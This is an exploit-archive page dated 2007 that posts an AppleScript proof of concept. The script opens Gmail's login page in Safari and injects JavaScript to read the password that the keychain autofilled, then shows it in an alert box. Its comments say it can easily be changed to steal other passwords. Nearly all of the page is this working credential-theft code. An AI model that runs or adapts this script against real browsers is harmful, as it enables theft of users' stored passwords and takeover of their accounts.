Home / exploitsPDF  

gmailsteal_local.scpt.txt

Posted on 30 September 2007

-- This script can be used to steal gmail's keychained password by injecting -- Javascripts into Safari. When executed it opens gmail's login page, reads -- saved password and prompts it into an alert box. -- It can be easly modified to steal other pass. -- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007 --Stealing code set JSTEAL to "alert(document.getElementById('gaia_loginform').Passwd.value)" --Open gmail login page tell application "Safari" open location "https://www.google.com/accounts/ServiceLogin?service=mail" end tell --Wait loading... delay 10 --Print out password tell application "Safari" do JavaScript JSTEAL in document 1 end tell

 

TOP